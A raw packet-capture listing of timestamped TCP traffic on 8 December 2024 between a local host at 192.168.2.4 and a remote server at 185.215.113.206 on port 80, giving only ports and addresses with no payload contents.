Dec 8, 2024 19:52:30.256068945 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.256674051 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.256752014 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.256798983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.257390022 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.257468939 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.257518053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.258399010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.258445978 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.258491993 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.259052992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.259099007 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.259119987 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.259860992 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.259913921 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.260019064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.260498047 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.260759115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.261120081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.261181116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.261478901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.261594057 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.261657000 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.262314081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.262360096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.262362003 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.263143063 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.263197899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.263281107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.264117956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.264162064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.264244080 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.264286995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.264972925 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.265022993 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.265073061 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.265656948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.265908957 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.265953064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.266324997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.266366959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.266711950 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.267163038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.267205954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.267246008 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.268042088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.268081903 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.268102884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.268142939 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.268948078 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.269110918 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.269151926 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.269834042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.269932032 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.269982100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.270539999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.270586967 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.270668030 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.271284103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.271318913 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.271346092 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.271385908 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.272186995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.272238970 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.272284985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.273101091 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.273454905 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.273499966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.274210930 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.274259090 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.423415899 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.423429012 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.423516035 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.423546076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.423566103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.423612118 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.424170017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.424329996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.424386024 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.425148010 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.425329924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.425384998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.425990105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.426042080 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.426052094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.427047968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.427094936 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.427114964 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.428075075 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.428122044 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.428177118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.428215027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.428922892 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.428997040 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.429059029 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.429658890 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.429784060 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.429837942 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.430412054 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.430464029 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.430499077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.430665970 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.431148052 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.431216955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.431265116 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.431859016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.431925058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.431953907 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.431996107 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.432647943 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.432712078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.432791948 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.432959080 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.433545113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.433598995 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.433614969 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.433651924 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.434191942 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.434240103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.434282064 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.434319973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.434937000 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.434987068 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.434992075 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.435035944 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.435619116 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.435678959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.435697079 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.435729027 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.436486959 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.436597109 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.436650991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.437099934 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.437175035 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.437222004 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.437287092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.437328100 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.438024998 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.438180923 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.438242912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.438859940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.438973904 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.439028978 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.439599037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.439728975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.439766884 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.440408945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.440488100 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.440490961 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.441277027 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.441328049 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.441346884 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.441409111 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.442044973 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.442094088 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.442173004 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.442209959 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.442854881 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.442939043 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.442966938 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.443002939 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.443746090 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.443794012 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.443810940 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.443847895 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.444508076 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.444569111 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.444575071 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.444803953 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.445286036 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.445337057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.445437908 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.445482016 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.446191072 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.446557999 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.446599960 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.447091103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.447110891 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.447150946 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.447904110 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.447941065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.448016882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.448494911 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.448817015 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.448863983 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.449078083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.449129105 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.449559927 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.449671030 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.449702024 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.449903965 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.450524092 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.450575113 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.450690031 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.450784922 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.451242924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.451370955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.451417923 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.452274084 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.452320099 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.452404976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.452506065 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.453190088 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.453252077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.453299046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.453989983 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.454080105 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.454130888 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.454772949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.454819918 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.454895973 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.455528975 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.455569029 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.455720901 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.456391096 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.456430912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.456473112 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.456818104 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.457302094 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.457355976 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.457401037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.457442999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.458142996 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.458192110 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.458245039 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.458287954 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.459112883 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.459192991 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.459235907 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.459682941 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.459785938 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.459851980 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.459903955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.460597038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.460642099 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.460660934 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.460705042 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.461349964 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.461369038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.461407900 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.462294102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.462363005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.462405920 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.463083982 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.463124037 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.463193893 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.463891029 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.463932037 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.464093924 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.464138985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.464602947 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.464621067 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.464648962 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.464659929 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.465430021 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.465473890 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.465506077 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.465543985 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.466036081 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.466087103 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.615381956 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.615394115 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.615454912 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.615596056 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.615761042 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.615807056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.616379976 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.616430998 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.616511106 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.616564989 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.617175102 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.617217064 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.617290974 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.617449999 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.618006945 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.618051052 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.618150949 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.618195057 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.618908882 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.618961096 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.619079113 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.619121075 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.619693995 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.619735956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.619765997 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.619811058 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.620420933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.620462894 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.620546103 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.620590925 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.621217966 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.621258974 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.621279955 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.621316910 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.622272968 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.622319937 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.622370005 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.622411966 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.623056889 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.623100996 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.623127937 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.623169899 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.623799086 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.623835087 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.623857021 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.623878956 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.624573946 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.624618053 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.624622107 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.624660015 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.625344038 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.625385046 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.625458002 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.625498056 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.626101017 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.626146078 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.626276016 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.626321077 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.626948118 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.626996994 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.627055883 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.627099037 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.627759933 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.627803087 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.627811909 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.627851009 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.628607035 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.628688097 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.628736973 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.629431963 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.629476070 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.629547119 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.629601955 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.630259037 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.630302906 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.630384922 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.630428076 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.631030083 CET	80	49748	185.215.113.206	192.168.2.4
Dec 8, 2024 19:52:30.631073952 CET	49748	80	192.168.2.4	185.215.113.206
Dec 8, 2024 19:52:30.631109953 CET	80	49748	185.215.113.206	192.168.2.4
